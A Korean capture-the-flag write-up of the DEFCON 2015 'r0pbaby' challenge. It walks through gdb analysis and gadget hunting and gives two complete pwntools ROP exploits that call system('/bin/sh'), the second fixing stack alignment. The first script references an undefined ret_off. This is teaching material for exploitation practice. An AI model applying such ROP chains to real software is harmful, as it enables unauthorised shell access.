r0pbaby

2015 DEFCON CTF 문제 r0pbaby - Baby's First 1

 

파일 이름부터 rop(Return Oriented Programming) 기법을 암시합니다.

dynamically linked, NX enabled를 통해 rtl(Return To Library)를 고려해 둡시다.

 

먼저 실행을 시켜볼까요

execute.png

<libc, 함수>의 주소를 받을 수 있고, 스택에 입력을 할 수 있네요.

gdb에서 실행 후 과연 올바른 주소인지 알아봅시다.

 

gdb 실행 후, Ctrl+C로 일시정지 합니다.

프로그램이 뱉은 libc 주소와 실제 주소를 비교해 봅니다.

 

프로그램을 통해 알게 된 libc 주소는 포인터 주소로 보입니다.

포인터 주소를 가지고 offset 작업을 하기에는 무리가 있기에, 1번 메뉴는 제외하고 문제를 풀어나가야 겠네요.

 

그렇다면 2번 메뉴, 함수의 주소는 어떨까요?

 

2번 메뉴의 system 함수 주소

실제 system 함수의 주소

 

동일합니다.

2번 메뉴는 믿고 사용해도 되겠네요.

 

다음으로 3번 메뉴를 살펴볼까요.

 

RBP(0x7fffffffdee0)에 입력값을 받는다.

 

3번 메뉴에 breakpoint를 걸어주고 쭉 내려가다보면, memcpy가 나옵니다.

rbp부터 바로 입력이 들어감을 알 수 있습니다.

실제로, ida로 까보면 rbp에 바로 입력되는 모습을 쉽게 확인할수 있죠.

최종적으로 savedregs으로 옮겨지는 모습

savedregs의 위치

또한, 계속해서 보면 별다른 dummy없이 바로 ret addr가 있습니다.

 

 

이제 payload 구성을 해봅시다.

dummy(8)

pr(pop rdi, ret)

"/bin/sh" pointer

system func

pr은 system 함수의 인자를 전달할 pop rdi와 함수를 호출할 ret로 구성된 가젯입니다.

 

64bit 프로그램은 스택을 통해 함수인자를 전달하던 32bit프로그램과는 달리,

rdi, rsi, rdx ... 의 순으로 인자를 전달합니다.

32/64 함수 인자 전달 과정

 

system("/bin/sh")를 위해

이제 각 인자(pr, "bin/sh")의 offset을 구해야겠네요.

* offset을 구하는 이유는 해당 프로그램이 aslr이 걸려있기 때문이죠.

 

pr 과 binsh는 각각 rp++와 strings명령어를 통해 구해봤습니다.

 

 

1)  pr

rp++

-r 옵션은 가젯속 명령의 최대 크기(2)를 의미합니다.

아래로 내려보면 수많은 "pop rdi ; ret" 가젯이 나옵니다.

많은 수의 가젯들

이 중 아무거나 하나를 골라 사용합니다.

 

 

2) binsh

binsh는 리눅스 기본 명령어 strings를 이용해봅시다.

strings의 옵션들

 

strings 실행 모습

-tx 옵션은 문자열의 위치를 16진수로 보여줍니다.

 

이렇게 필요한 offset들은 다 찾았습니다.

이제 pwntools를 이용해서 exploit해봅시다.

 

#! /usr/bin/python3
from pwn import *

filename = "./r0pbaby"
p = process(filename)
libc = ELF("./libc.so.6")

# offsets of frags
binsh_off = 0x1d8698
pr_off = 0x0012d7ad

'''
Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
'''

# get system address(static)
p.recv()
p.sendline(b'2')
p.recv() # Enter symbol:  
p.sendline(b"system")

p.recvuntil(b"Symbol system: 0x")
tmp = int(p.recvline(), 16)
system_addr = tmp
log.info("system function address : 0x%x" % system_addr)
p.recv()

# calculate libc_main, binsh, pr address(static)
libc_main_addr = system_addr - libc.symbols['system']
binsh_addr = libc_main_addr + binsh_off
pr_addr = libc_main_addr + pr_off
ret_addr =  libc_main_addr + ret_off

log.info("libc main address : 0x%x" % libc_main_addr)
log.info("\"/bin/sh\" address : 0x%x" % binsh_addr)
log.info("\"pop edi ; ret\" address : 0x%x" % pr_addr)
log.info("\"ret\" address : 0x%x" % ret_addr)

# attack
# dummy(8) | pr(8) | binsh(8) | system(8)
payload = b'A'*8
payload += p64(pr_addr)
payload += p64(binsh_addr)
payload += p64(system_addr)

p.sendline(b'3')
p.recv()
p.sendline(str(len(payload) + 1).encode('utf-8'))
p.sendline(payload)
p.recv()

p.sendline(b'4')
p.recv()
p.interactive()

 

이제 실행을 시켜보면..!!

되는 사람도, 안되는 사람도 있을텐데요.

안되서 많이 놀라셨죠? 저는 놀람..

 

중간중간 pause를 걸고 gdb로 뜯어보니, 잘 실행되다 do_system에서 오류가 발생합니다..

do_system 오류

왜그러지..? 하고 찾아보니

Ubuntu 18.04부터 효율상의 문제로 stack의 top, 즉 rsp를 16의 배수로 맞춰주어야 한다네요..

참조 : https://hackyboiz.github.io/2020/12/06/fabu1ous/x64-stack-alignment/

자세한 설명은 정보를 모아 나중에 포스팅 해봐야겠네요.

 

그리하여 payload의 두 번째 pr시 rsp를 16의 배수로 맞춰주어야 합니다.

그럼 dummy와 pr 사이에 return 가젯을 추가하여 밀어낼수 있겠습니다.

엄밀히 말하면 깨질 stack align을 ret를 통해 미리 깨고 조립해주는..

dummy(8)

ret

pr(pop rdi, ret)

"/bin/sh" pointer

system func

 

다시 공격 코드를 수정하여 실행시켜 봅시다.

#! /usr/bin/python3
from pwn import *

filename = "./r0pbaby"
p = process(filename)
libc = ELF("./libc.so.6")

# offsets of frags
binsh_off = 0x1d8698
pr_off = 0x0012d7ad
ret_off = 0x001b403e

'''
Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
'''

# get system address(static)
p.recv()
p.sendline(b'2')
p.recv() # Enter symbol:  
p.sendline(b"system")

p.recvuntil(b"Symbol system: 0x")
tmp = int(p.recvline(), 16)
system_addr = tmp
log.info("system function address : 0x%x" % system_addr)
p.recv()

# calculate libc_main, binsh, pr, ret address(static)
libc_main_addr = system_addr - libc.symbols['system']
binsh_addr = libc_main_addr + binsh_off
pr_addr = libc_main_addr + pr_off
ret_addr =  libc_main_addr + ret_off

log.info("libc main address : 0x%x" % libc_main_addr)
log.info("\"/bin/sh\" address : 0x%x" % binsh_addr)
log.info("\"pop edi ; ret\" address : 0x%x" % pr_addr)
log.info("\"ret\" address : 0x%x" % ret_addr)

# attack
# dummy(8) | ret(8) | pr(8) | binsh(8) | system(8)
payload = b'A'*8
payload += p64(ret_addr)
payload += p64(pr_addr)
payload += p64(binsh_addr)
payload += p64(system_addr)

p.sendline(b'3')
p.recv()
p.sendline(str(len(payload) + 1).encode('utf-8'))
p.sendline(payload)
p.recv()

p.sendline(b'4')
p.recv()
p.interactive()

 

쉘을 따낸 모습

성공적으로 쉘이 따집니다.

매우 간단하지만 복잡한(movaps...) r0pbaby문제였습니다.

 

동포청년, 이제 stack alignment는 지키자고